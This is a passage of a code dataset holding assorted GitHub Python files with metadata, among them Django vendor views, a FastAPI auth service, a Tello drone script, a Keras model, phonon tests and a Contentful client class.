plottheThing(arg)\n\n","repo_name":"joshuamorton/Machine-Learning","sub_path":"P2/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74808824691","text":"from string import ascii_uppercase, digits\n\n\ndef n_to_p(n, p):\n r = ''\n a = digits + ascii_uppercase\n while n > 0:\n d = a[n % p]\n r = d + r\n n //= p\n return r\n\n\nfor n in range(6, 30):\n if n_to_p(29, n)[-1] == '5':\n print(n)\n","repo_name":"hypergraphman/DimaEGE23","sub_path":"task14/25015562/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20829259507","text":"import datetime\nimport configparser\n\nfrom rssht_controller_lib import config as cconfig\n\nfrom . import config\n\n\ndef timedelta_repr(td):\n conv_table = [\n (1, 'second'),\n (60, 'minute'),\n (60 * 60, 'hour'),\n (60 * 60 * 24, 'day'),\n (60 * 60 * 24 * 7, 'week'),\n (60 * 60 * 24 * 30, 'month'),\n (60 * 60 * 24 * 365, 'year'),\n (int(datetime.timedelta.max.total_seconds()) + 1, 'inf'),\n ]\n total_seconds = td.total_seconds()\n \n for i in range(1, len(conv_table)):\n seconds = conv_table[i][0]\n prev_seconds, prev_scale = conv_table[i - 1]\n \n if total_seconds < seconds:\n break\n \n magnitude = int(total_seconds / prev_seconds)\n repr_ = f'{magnitude} {prev_scale}'\n \n if magnitude != 1:\n repr_ = f'{repr_}s'\n \n return repr_\n\n\ndef load_config(filename=None):\n filename = config.CONFIG_FILENAME if filename is None else filename\n \n parser = configparser.ConfigParser()\n \n with open(filename) as f:\n parser.read_file(f)\n \n Null = object()\n \n server_address = parser.get('Settings', 'ServerAddress', fallback=Null)\n server_port = parser.get('Settings', 'ServerPort', fallback=Null)\n server_username = parser.get('Settings', 'ServerUsername', fallback=Null)\n key_filename = parser.get('Settings', 'KeyFilename', fallback=Null)\n server_swap_directory = parser.get('Settings', 'ServerSwapDirectory', fallback=Null)\n sleep_interval_secs = parser.get('Settings', 'SleepIntervalSecs', fallback=Null)\n last_seen_alarm_secs = parser.get('Settings', 'LastSeenAlarmSecs', fallback=Null)\n \n if server_port is not Null:\n server_port = int(server_port)\n if sleep_interval_secs is not Null:\n sleep_interval_secs = int(sleep_interval_secs)\n if last_seen_alarm_secs is not Null:\n last_seen_alarm_secs = int(last_seen_alarm_secs)\n \n if server_address is not Null:\n cconfig.RSSHT_SERVER_ADDR = server_address\n if server_port is not Null:\n cconfig.RSSHT_SERVER_PORT = server_port\n if server_username is not Null:\n cconfig.RSSHT_SERVER_USERNAME = server_username\n if key_filename is not Null:\n cconfig.KEY_FILENAME = key_filename\n if server_swap_directory is not Null:\n cconfig.RSSHT_SERVER_SWAP_DIR = server_swap_directory\n if sleep_interval_secs is not Null:\n config.UPDATE_SLEEP_INTERVAL = sleep_interval_secs\n if last_seen_alarm_secs is not Null:\n config.AGENT_LAST_SEEN_ALARM_THRESHOLD = last_seen_alarm_secs\n\n\ndef persist_config(filename=None):\n filename = config.CONFIG_FILENAME if filename is None else filename\n \n parser = configparser.ConfigParser()\n parser['Settings'] = {\n 'ServerAddress': cconfig.RSSHT_SERVER_ADDR,\n 'ServerPort': str(cconfig.RSSHT_SERVER_PORT),\n 'ServerUsername': cconfig.RSSHT_SERVER_USERNAME,\n 'KeyFilename': cconfig.KEY_FILENAME,\n 'ServerSwapDirectory': cconfig.RSSHT_SERVER_SWAP_DIR,\n 'SleepIntervalSecs': str(config.UPDATE_SLEEP_INTERVAL),\n 'LastSeenAlarmSecs': str(config.AGENT_LAST_SEEN_ALARM_THRESHOLD),\n }\n \n with open(filename, 'w') as f:\n parser.write(f)\n","repo_name":"guallo/remote-ssh-tunnel-controller-qt","sub_path":"rssht_controller_qt/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73779282292","text":"from django. contrib import messages\nfrom django.http import JsonResponse\nfrom django.db import IntegrityError\nfrom django.shortcuts import get_object_or_404, render, redirect, HttpResponse \nfrom accounts.forms import UserForm, UserProfileForm\nfrom accounts.models import User, UserProfile\nfrom menu.models import Category, FoodItem\nfrom orders.models import Order, OrderedFood\nfrom vendors.forms import vendorForm, OpeningHourForm\nfrom accounts.utils import send_verification_email\nfrom .utils import get_vendor\nfrom django.utils.http import urlsafe_base64_decode\nfrom django.contrib.auth.tokens import default_token_generator\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom accounts.views import check_role_vendor\nfrom vendors.models import OpeningHour, Vendor\nfrom menu.forms import CategoryForm, FooditemForm\nfrom django.template.defaultfilters import slugify\n\n\n\n\n\ndef registerRestaurant(request):\n # this restrict user from going to Vendor Registration Page after Logged in \n if request.user.is_authenticated:\n messages.warning(request, \"You are already logged in!\")\n return redirect('vendordashboard')\n\n\n if request.method == 'POST':\n form = UserForm(request.POST)\n v_form = vendorForm(request.POST, request.FILES)\n if form.is_valid() and v_form.is_valid():\n vendor_name = v_form.cleaned_data['vendor_name']\n user = form.save(commit=False)\n user.role = User.VENDOR\n user.save()\n vendor = v_form.save(commit=False)\n vendor.user = user\n vendor.vendor_slug = slugify(vendor_name) + '' + str(user.id)\n user_profile = UserProfile.objects.get(user=user)\n vendor.user_profile = user_profile\n vendor.save()\n \n mail_subject = 'Please Activate your Account' \n email_template = 'accounts/emails/account_verification_email.html'\n send_verification_email(request, user, mail_subject, email_template) #send_verification_email is function created in utils.py\n messages.success(request, \"Your Account has been Registered Successfully, Please Wait for Approval\")\n return redirect('registervendor') \n else:\n messages.error(request, 'An Error occurred during registration!')\n \n else:\n form = UserForm()\n v_form = vendorForm()\n context = {\n 'form': form,\n 'v_form': v_form,\n }\n return render(request, 'vendor/registervendor.html', context)\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef VendorProfile(request):\n \n profile = get_object_or_404 (UserProfile, user=request.user)\n vendor = get_object_or_404 (Vendor, user=request.user)\n \n if request.method == 'POST':\n profile_form = UserProfileForm(request.POST, request.FILES, instance=profile)\n vendor_form = vendorForm(request.POST, request.FILES, instance=vendor)\n if profile_form.is_valid() and vendor_form.is_valid():\n profile_form.save()\n vendor_form.save()\n messages.success(request, 'Restaurant updated')\n return redirect('vendor-profile')\n else:\n messages.error(request, 'An Error occurred during registration!')\n \n else:\n profile_form = UserProfileForm(instance=profile)\n vendor_form = vendorForm(instance=vendor)\n\n context ={\n 'profile_form': profile_form, 'vendor_form': vendor_form, 'profile':profile, 'vendor': vendor,\n }\n return render(request, 'vendor/vendor_profile.html', context)\n\n\n #Activate the User by setting the is_active status to True\ndef activate(request, uidb64, token):\n try:\n uid = urlsafe_base64_decode(uidb64).decode()\n user = User._default_manager.get(pk=uid)\n except(TypeError, ValueError, OverflowError, User.DoesNotExist):\n user = None\n \n if user is not None and default_token_generator.check_token(user, token):\n user.is_active = True\n user.save()\n messages.success(request, \"Congratulation!, Your Account is Activated\")\n return redirect('myaccount')\n else:\n messages.error(request, 'Invalid Activation link')\n return\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef MenuBuilder(request):\n vendor = get_vendor(request)\n #categories = vendor.category_set.all().order_by('created_at')\n categories = Category.objects.filter(vendor=vendor).order_by('created_at')\n context = {'categories': categories}\n return render(request, 'vendor/menu_builder.html', context)\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef fooditems_by_category(request, pk):\n vendor = get_vendor(request)\n category = get_object_or_404 (Category, id=pk)\n fooditems = FoodItem.objects.filter(Vendor=vendor, category=category)\n \n context = {\n 'fooditems': fooditems,\n 'category': category,\n }\n\n return render (request, 'vendor/fooditems_by_category.html', context)\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef AddCategory(request):\n venddor = get_vendor(request)\n if request.method == 'POST':\n category_form = CategoryForm(request.POST)\n #if Category.objects.filter(category_name__iexact=category_name).exists():\n if category_form.is_valid():\n category_name = category_form.cleaned_data['category_name']\n category = category_form.save(commit=False)\n category.vendor = get_vendor(request)\n category.save()\n category.slug = slugify(category_name)+'-'+str(category.id)\n category.save()\n messages.success(request, 'Category added successfully')\n return redirect('menu-builder')\n else: \n messages.error(request, 'Data already exist')\n else:\n category_form = CategoryForm()\n\n context = {\n 'category_form': category_form,\n }\n return render(request, 'vendor/add-category.html', context)\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef EditCategory(request, pk):\n category = Category.objects.get(id=pk)\n if request.method == 'POST':\n category_form = CategoryForm(request.POST, instance=category)\n if category_form.is_valid():\n category_name = category_form.cleaned_data['category_name']\n category = category_form.save(commit=False)\n category.vendor = get_vendor(request)\n category.slug = slugify(category_name)\n category.save()\n messages.success(request, 'Category updated successfully')\n return redirect('menu-builder')\n else: \n messages.error(request, 'Data already exist')\n else:\n category_form = CategoryForm(instance=category)\n\n context = {\n 'category_form': category_form,\n 'category': category,\n }\n return render (request, 'vendor/edit-category.html', context)\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef DeleteCategory(request, pk):\n category = Category.objects.get(id=pk)\n category.delete()\n messages.success(request, 'Category has been deleted successfully')\n return redirect('menu-builder')\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef Addfooditem(request):\n if request.method == 'POST':\n form = FooditemForm(request.POST, request.FILES)\n if form.is_valid():\n food_title = form.cleaned_data['food_title']\n fooditem = form.save(commit=False)\n fooditem.Vendor = get_vendor(request)\n fooditem.slug = slugify(food_title)\n fooditem.save()\n messages.success(request, 'Food added successfully')\n return redirect('fooditems_by_category', fooditem.category.id)\n else:\n messages.error(request, 'Data already exist')\n else:\n form = FooditemForm()\n\n # modify form so as to select Category of current User\n form.fields['category'].queryset = Category.objects.filter(vendor=get_vendor(request))\n context ={'form': form,}\n return render(request, 'vendor/add-fooditem.html', context)\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef Editfooditem(request, pk):\n #fooditem = FoodItem.objects.get(id=pk)\n fooditem = get_object_or_404(FoodItem, id=pk)\n \n \n if request.method == 'POST':\n form = FooditemForm (request.POST, request.FILES, instance=fooditem)\n if form.is_valid():\n food_title = form.cleaned_data['food_title']\n fooditem = form.save(commit=False)\n fooditem.vendor = get_vendor(request)\n fooditem.slug = slugify(food_title)\n fooditem.save()\n messages.success(request, 'Category updated successfully')\n return redirect('fooditems_by_category', fooditem.category.id)\n else:\n messages.error(request, 'An Error occurred during registration!')\n else:\n form = FooditemForm(instance=fooditem)\n\n # modify form so as to select Category of current User\n form.fields['category'].queryset = Category.objects.filter(vendor=get_vendor(request))\n context = {\n 'form' : form,\n 'fooditem': fooditem,\n }\n return render(request, 'vendor/edit-fooditem.html', context)\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef Deletefooditem(request, pk):\n food = FoodItem.objects.get(id=pk)\n food.delete()\n messages.success(request, 'Food has been deleted successfully')\n return redirect('fooditems_by_category', food.category.id)\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef openingHours(request):\n opening_hours = OpeningHour.objects.filter(vendor=get_vendor(request))\n form = OpeningHourForm\n\n context = {\n 'form': form,\n 'opening_hours': opening_hours,\n }\n return render(request, 'vendor/opening_hour.html', context)\n\n\ndef openingHoursAdd(request):\n if request.user.is_authenticated:\n if request.headers.get('x-requested-with') == 'XMLHttpRequest' and request.method == 'POST':\n day = request.POST.get('day')\n from_hour = request.POST.get('from_hour')\n to_hour = request.POST.get('to_hour')\n is_closed = request.POST.get('is_closed')\n \n try:\n hour = OpeningHour.objects.create(vendor=get_vendor(request), day=day, from_hour=from_hour, to_hour=to_hour, is_closed=is_closed)\n if hour:\n day = OpeningHour.objects.get(id=hour.id)\n if day.is_closed:\n response = {'status': 'success', 'id': hour.id, 'day':day.get_day_display(), 'is_closed': 'Closed'}\n else:\n response = {'status': 'success', 'id': hour.id, 'day':day.get_day_display(), 'from_hour': from_hour, 'to_hour': to_hour}\n return JsonResponse(response)\n\n except IntegrityError as e:\n response = {'status': 'failed', 'message': from_hour+'-'+to_hour+' already exists for this day!'}\n return JsonResponse(response)\n\n else:\n HttpResponse('Invalid request')\n return HttpResponse('add opening hour')\n\n\ndef openingHoursEdit(request, pk):\n pass\n\n\ndef removeopeningHours(request, pk=None):\n if request.user.is_authenticated:\n if request.headers.get('x-requested-with') == 'XMLHttpRequest':\n hour = get_object_or_404(OpeningHour, pk=pk)\n hour.delete()\n return JsonResponse({'status': 'success', 'id': pk})\n\ndef OrderDetail(request, order_number):\n try:\n order = Order.objects.get(order_number=order_number, is_ordered=True)\n ordered_food = OrderedFood.objects.filter(order=order, fooditem__Vendor=get_vendor(request))\n context ={\n 'order': order,\n 'ordered_food':ordered_food,\n 'subtotal': order.get_total_by_vendor()['subtotal'],\n 'tax_data': order.get_total_by_vendor()['tax_dict'],\n 'grand_total': order.get_total_by_vendor()['grand_total'],\n }\n return render(request, 'vendor/order_detail.html', context)\n except:\n return redirect('vendordashboard')\n \n\ndef my_orders(request):\n vendor = Vendor.objects.get(user=request.user)\n orders = Order.objects.filter(vendors__in=[vendor.id], is_ordered=True).order_by('-created_at')\n context= {\n 'orders': orders,\n }\n return render(request, 'vendor/my_orders.html', context)","repo_name":"Asoliudeen1/foodOnline","sub_path":"vendors/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18240591802","text":"import itertools\r\nfrom collections import Counter\r\n\r\ndef get_state(person):\r\n return person['state']\r\n\r\npeople = [\r\n {'name':'jaya',\r\n 'city':'tirupati',\r\n 'state':'AP'\r\n },\r\n {'name':'raj',\r\n 'city':'krishnagiri',\r\n 'state':'TN'\r\n },\r\n {'name':'sonu',\r\n 'city':'kolar',\r\n 'state':'KA'\r\n },\r\n {'name':'jaya',\r\n 'city':'tirupati',\r\n 'state':'AP'\r\n },\r\n {'name':'perumal',\r\n 'city':'krishnagiri',\r\n 'state':'TN'\r\n },\r\n {'name':'dood',\r\n 'city':'mehaboobnagar',\r\n 'state':'TLG'\r\n },\r\n {'name':'ram',\r\n 'city':'tirupati',\r\n 'state':'AP'\r\n },\r\n {'name':'lanja',\r\n 'city':'krishnagiri',\r\n 'state':'TN'\r\n },\r\n {'name':'lovely',\r\n 'city':'kolar',\r\n 'state':'KA'\r\n }\r\n ]\r\n\r\nperson_group = itertools.groupby(people,get_state)\r\nl=[]\r\nfor key,group in person_group:\r\n l.append(key)\r\n#print(l)\r\ncnt=Counter(l)\r\n#print(cnt)\r\nfor i,j in cnt.items():\r\n print(i,j)\r\n # print(i[0],i[1])\r\n #print(key)\r\n\r\n## print(key)\r\n## for per in group:\r\n## print(per,end=\"\")\r\n## print()\r\n","repo_name":"hadoopaws8/my_owned_python_programs","sub_path":"itertools1.py","file_name":"itertools1.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3564352534","text":"import os\n\nimport uvicorn\nfrom fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom AuthService.app.config import settings\nfrom AuthService.app.routers import auth, user\nfrom AuthService.auth_comm import AUTH_SERVICE_NAME\nfrom AuthService.discovery_comm import DiscoveryServiceComm\n\napp = FastAPI()\nAUTH_SERVICE_HOST = os.getenv(\"AUTH_SERVICE_HOST\", \"127.0.0.1\")\nAUTH_SERVICE_PORT = 8081\nAUTH_DISCOVERY = DiscoveryServiceComm(service_name=AUTH_SERVICE_NAME, port=str(AUTH_SERVICE_PORT),\n host=AUTH_SERVICE_HOST)\n\norigins = [\n settings.CLIENT_ORIGIN,\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\napp.include_router(auth.router, tags=['Auth'], prefix='/api/auth')\napp.include_router(user.router, tags=['Users'], prefix='/api/users')\n\n\n@app.post(\"/status\")\ndef root():\n return AUTH_DISCOVERY.get_status_data()\n\n\nif not AUTH_DISCOVERY.check_connection():\n raise Exception(\"Discovery service unavailable\")\n\nif not AUTH_DISCOVERY.register_force():\n raise Exception(f\"Registration unsuccessful, Status code:{AUTH_DISCOVERY.get_status_code()}\")\nprint(\"Registration successful\")\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=AUTH_SERVICE_HOST, port=AUTH_SERVICE_PORT)\n","repo_name":"GheorgheMorari/PAD","sub_path":"AuthService/auth_service_main.py","file_name":"auth_service_main.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27827482723","text":"import random\r\nimport string\r\n\r\ndef game():\r\n gameover = input('Type \"play\" to play the game, \"exit\" to quit:')\r\n if gameover == 'exit':\r\n return False\r\n elif gameover == 'play':\r\n pass\r\n else:\r\n return True \r\n print()\r\n variants = ['python', 'java', 'kotlin', 'javascript']\r\n answer = random.choice(variants)\r\n hint ='-' * len(answer)\r\n shower=list(hint)\r\n my_set=set(answer)\r\n answer_set = set()\r\n trying = 8\r\n while trying > 0:\r\n print(hint)\r\n guess = input(\"Input a letter: \")\r\n if len(guess) != 1:\r\n print(\"You should print a single letter\")\r\n print()\r\n continue\r\n if guess not in string.ascii_lowercase:\r\n print(\"It is not an ASCII lowercase letter\")\r\n print()\r\n continue\r\n if guess in answer_set:\r\n print(\"You already typed this letter\")\r\n print()\r\n continue\r\n if guess in my_set:\r\n for z in range(len(answer)):\r\n if guess == answer[z]:\r\n shower[z] = guess\r\n answer_set.add(guess)\r\n hint=''.join(shower)\r\n if hint == answer:\r\n break\r\n \r\n if guess not in my_set:\r\n print(\"No such letter in the word\")\r\n answer_set.add(guess)\r\n trying -= 1 \r\n if trying == 0:\r\n break\r\n print()\r\n if trying > 0:\r\n print(\"You guessed the word!\")\r\n print(\"You survived!\")\r\n else:\r\n print(\"You are hanged!\")\r\n print()\r\n return True\r\n \r\n \r\nprint(\"H A N G M A N\")\r\nmenu = True\r\nwhile menu == True:\r\n menu = game()\r\n","repo_name":"poznerrr/Hangman_Game_Python","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1308639754","text":"#importing libraries\nfrom djitellopy import tello\nimport keyboard as key\nfrom time import sleep\nfrom pano import pano_bridge\nimport cv2\n\n#initiating communication\ndrone = tello.Tello()\ndrone.connect()\ndrone.streamon()\n\nprint(drone.get_battery())\n\n#manual override\ndef getInput():\n lr, fb, ud, yv = 0, 0, 0, 0\n x = 60 \n #key press detection\n if key.is_pressed('left'): \n lr = -x\n elif key.is_pressed('right'): \n lr = x\n \n if key.is_pressed('up'): \n ud = x\n elif key.is_pressed('down'): \n ud = -x\n \n if key.is_pressed('w'): \n fb = x\n elif key.is_pressed(\"s\"): \n fb = -x\n \n if key.is_pressed('a'): \n yv = -x\n elif key.is_pressed('d'): \n yv = x\n \n if key.is_pressed('t'): \n drone.takeoff()\n elif key.is_pressed('l'): \n drone.land()\n \n \n return [lr, fb, ud, yv]\n\n#image capture movements\ndef right():\n drone.send_rc_control(0,0,0,35)\n sleep(2)\n ntg()\n \ndef left():\n drone.send_rc_control(0,0,0,-35)\n sleep(2)\n ntg()\n \ndef ntg():\n drone.send_rc_control(0,0,0,0)\n sleep(1)\n \n#capturing images\ndef capture(i):\n cap = drone.get_frame_read().frame\n loc1 = 'F:/Projects/droneProj/v2.0/Pano/Pics/'+str(i)+'.jpg'\n cv2.imwrite(loc1, cap)\n \ndef panorama():\n #image capture begin\n ntg()\n right()\n capture(1)\n left()\n capture(2)\n left()\n capture(3)\n right()\n ntg()\n \n #image stitch' processing\n pano_bridge()\n \ndef features():\n if key.is_pressed('P'):\n panorama()\n\nwhile True:\n #manual controls\n val = getInput()\n drone.send_rc_control(val[0], val[1], val[2], val[3])\n \n #feature detection\n features()\n \n #get frames from tello\n frame = drone.get_frame_read().frame\n \n #output live relay\n cv2.imshow(\"Live Stream\", frame)\n cv2.waitKey(1)\n","repo_name":"varunveeraa/panorama_tello","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"39226729113","text":"\"\"\"\n18th october\n---\nGiven a list, find the k-th largest element in the list.\n\nInput: list = [3, 5, 2, 4, 6, 8], k = 3\nOutput: 5\n\"\"\"\n\n\ndef find_kth_largest(nums: list, k: int) -> int:\n highest = -1\n while k > 0:\n k -= 1\n highest = max(nums)\n nums.remove(highest)\n return highest\n","repo_name":"nicoaravena/my-daily-solution","sub_path":"src/twenty_two/october/kth_largest_in_a_list.py","file_name":"kth_largest_in_a_list.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15309645905","text":"from keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom sklearn.model_selection import train_test_split\nimport numpy\n\nnumpy.random.seed(2)\n\ndataset = numpy.loadtxt(\"DATASET.csv\", delimiter=\",\")\n\nX = dataset[:,0:2]\nY = dataset[:,2]\n\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=42)\n\nmodel = Sequential()\nmodel.add(Dense(15, input_dim=2, activation='relu'))\nmodel.add(Dense(10, activation='relu'))\nmodel.add(Dense(8, activation='relu'))\nmodel.add(Dropout(.2))\nmodel.add(Dense(1, activation='sigmoid'))\n\nmodel.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=['accuracy'])\n\nmodel.fit(x_train, y_train, epochs = 8000, batch_size=20, validation_data=(x_test, y_test))\n\nscores = model.evaluate(X, Y)\nsecondScores = model.evaluate(x_test, y_test)\n\nif (scores < secondScores):\n print(\"Доход чиновников, возможно, увеличиться на \" + \"\\n%s: %.2f%%\" % (model.metrics_names[1], scores[1]*10))\n\nelse:\n print(\"Доход чиновников, возможно, уменьшиться на \" + \"\\n%s: %.2f%%\" % (model.metrics_names[1], scores[1]*10))\n\nmodel.save('weights.h5')\n","repo_name":"Siyet/mim_hack_msk","sub_path":"neural/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19024105410","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport numpy as np\n\nimport cellconstructor as CC\nimport cellconstructor.Phonons\n\n\nimport sys, os\n\ndef test_supercell_fourier():\n\n total_path = os.path.dirname(os.path.abspath(__file__))\n os.chdir(total_path)\n\n\n SUPER_DYN = \"../TestPhononSupercell/dynmat\"\n NQIRR = 8\n SUPERCELL = (3, 3, 2)\n\n\n dyn = CC.Phonons.Phonons(SUPER_DYN, NQIRR)\n\n\n fc = dyn.GetRealSpaceFC(SUPERCELL)\n fc_new = fc.copy()\n\n\n print(\"Real space:\")\n print(fc[:6, :6])\n\n print(\"First one:\")\n print(dyn.dynmats[0])\n\n\n print (\"Distances\")\n super_structure = dyn.structure.generate_supercell(SUPERCELL)\n m =super_structure.get_masses_array()\n nq = np.prod(SUPERCELL)\n nat_sc = dyn.structure.N_atoms *nq\n\n _m_ = np.zeros(3*nat_sc)\n for i in range(nat_sc):\n _m_[3 * i : 3*i + 3] = m[i]\n\n m_mat = np.outer(1 / np.sqrt(_m_), 1 / np.sqrt(_m_))\n\n fc *= m_mat\n\n w_tot = np.sqrt(np.abs(np.real(np.linalg.eigvals(fc))))\n w_tot.sort()\n\n w_old = np.zeros(len(w_tot))\n\n for i in range(nq):\n w,p = dyn.DyagDinQ(i)\n w_old[ i * len(w) : (i+1) * len(w)] = w\n\n w_old.sort() \n print (\"Freq:\")\n print (\"\\n\".join ( [\" %.5f vs %.5f\" % (w_tot[i] * CC.Phonons.RY_TO_CM, w_old[i] * CC.Phonons.RY_TO_CM) for i in range (len(w_tot))]))\n\n\n # Try to revert the code\n\n dynmats_new = CC.Phonons.GetDynQFromFCSupercell(fc_new, np.array(dyn.q_tot), dyn.structure, super_structure)\n d2 = CC.Phonons.GetDynQFromFCSupercell_parallel(fc_new, np.array(dyn.q_tot), dyn.structure, super_structure)\n\n\n dyn_sc_new = CC.Phonons.GetSupercellFCFromDyn(dynmats_new, np.array(dyn.q_tot), dyn.structure, super_structure)\n dyn_sc_new2 = CC.Phonons.GetSupercellFCFromDyn(d2, np.array(dyn.q_tot), dyn.structure, super_structure)\n\n dist1 = np.max(np.abs(dyn_sc_new - fc_new))\n dist2 = np.max(np.abs(dyn_sc_new2 - fc_new))\n print (\"Distance reverted:\", dist1)\n print (\"Distance reverted:\", dist2)\n\n assert dist1 < 1e-10, 'Error in the fourier transform'\n assert dist2 < 1e-10, 'Error in the parallel fourier transform'\n\n #print \"\\n\".join ( [\"RATIO: %.5f \" % (w_tot[i] / w_old[i] ) for i in range (len(w_tot))])\n\n\nif __name__ == \"__main__\":\n test_supercell_fourier()\n","repo_name":"SSCHAcode/CellConstructor","sub_path":"tests/TestSupercellRealSpace/test_supercell_fourier.py","file_name":"test_supercell_fourier.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"13101871265","text":"from .resource import Resource, PublishResource, EnvironmentAwareResource\nfrom .content_type_field import ContentTypeField\nfrom .content_type_entries_proxy import ContentTypeEntriesProxy\nfrom .content_type_snapshots_proxy import ContentTypeSnapshotsProxy\nfrom .content_type_editor_interfaces_proxy import ContentTypeEditorInterfacesProxy\n\n\n\"\"\"\ncontentful_management.content_type\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nThis module implements the ContentType class.\n\nAPI reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/content-types\n\n:copyright: (c) 2018 by Contentful GmbH.\n:license: MIT, see LICENSE for more details.\n\"\"\"\n\n\nclass ContentType(Resource, PublishResource, EnvironmentAwareResource):\n \"\"\"\n API reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/content-types\n \"\"\"\n\n def __init__(self, item, **kwargs):\n super(ContentType, self).__init__(item, **kwargs)\n self.name = item.get('name', '')\n self.description = item.get('description', '')\n self.display_field = item.get('displayField', '')\n self.fields = [ContentTypeField(field)\n for field in item.get('fields', [])]\n\n @classmethod\n def base_url(klass, space_id, resource_id=None, public=False, environment_id=None, **kwargs):\n \"\"\"\n Returns the URI for the content type.\n \"\"\"\n\n if public:\n environment_slug = \"\"\n if environment_id is not None:\n environment_slug = \"/environments/{0}\".format(environment_id)\n return \"spaces/{0}{1}/public/content_types\".format(space_id, environment_slug)\n return super(ContentType, klass).base_url(\n space_id,\n resource_id=resource_id,\n environment_id=environment_id,\n **kwargs\n )\n\n @classmethod\n def create_attributes(klass, attributes, previous_object=None):\n \"\"\"\n Attributes for content type creation.\n \"\"\"\n\n result = super(ContentType, klass).create_attributes(attributes, previous_object)\n\n if 'fields' not in result:\n result['fields'] = []\n return result\n\n @classmethod\n def update_attributes_map(klass):\n \"\"\"\n Attributes for object mapping.\n \"\"\"\n\n return {\n 'name': '',\n 'description': '',\n 'display_field': '',\n 'fields': []\n }\n\n def to_json(self):\n \"\"\"\n Returns the JSON representation of the content type.\n \"\"\"\n\n result = super(ContentType, self).to_json()\n result.update({\n 'name': self.name,\n 'description': self.description,\n 'displayField': self.display_field,\n 'fields': [f.to_json() for f in self.fields]\n })\n return result\n\n def entries(self):\n \"\"\"\n Provides access to entry management methods for the given content type.\n\n API reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/entries\n\n :return: :class:`ContentTypeEntriesProxy ` object.\n :rtype: contentful.content_type_entries_proxy.ContentTypeEntriesProxy\n\n Usage:\n\n >>> content_type_entries_proxy = content_type.entries()\n \n \"\"\"\n return ContentTypeEntriesProxy(self._client, self.space.id, self._environment_id, self.id)\n\n def editor_interfaces(self):\n \"\"\"\n Provides access to editor interface management methods for the given content type.\n\n API reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/editor-interface\n\n :return: :class:`ContentTypeEditorInterfacesProxy ` object.\n :rtype: contentful.content_type_editor_interfaces_proxy.ContentTypeEditorInterfacesProxy\n\n Usage:\n\n >>> content_type_editor_interfaces_proxy = content_type.editor_interfaces()\n \n \"\"\"\n return ContentTypeEditorInterfacesProxy(self._client, self.space.id, self._environment_id, self.id)\n\n def snapshots(self):\n \"\"\"\n Provides access to snapshot management methods for the given content type.\n\n API reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/snapshots/content-type-snapshots-collection\n\n :return: :class:`ContentTypeSnapshotsProxy ` object.\n :rtype: contentful.content_type_snapshots_proxy.ContentTypeSnapshotsProxy\n\n Usage:\n\n >>> content_type_snapshots_proxy = content_type.entries()\n \n \"\"\"\n return ContentTypeSnapshotsProxy(self._client, self.space.id, self._environment_id, self.id)\n\n def __repr__(self):\n return \"\".format(\n self.name,\n self.sys.get('id', '')\n )\n","repo_name":"contentful/contentful-management.py","sub_path":"contentful_management/content_type.py","file_name":"content_type.py","file_ext":"py","file_size_in_byte":5455,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"21"} +{"seq_id":"36468674628","text":"from typing import Tuple, List, Generator\nimport math\nfrom shapely.geometry import box\nfrom 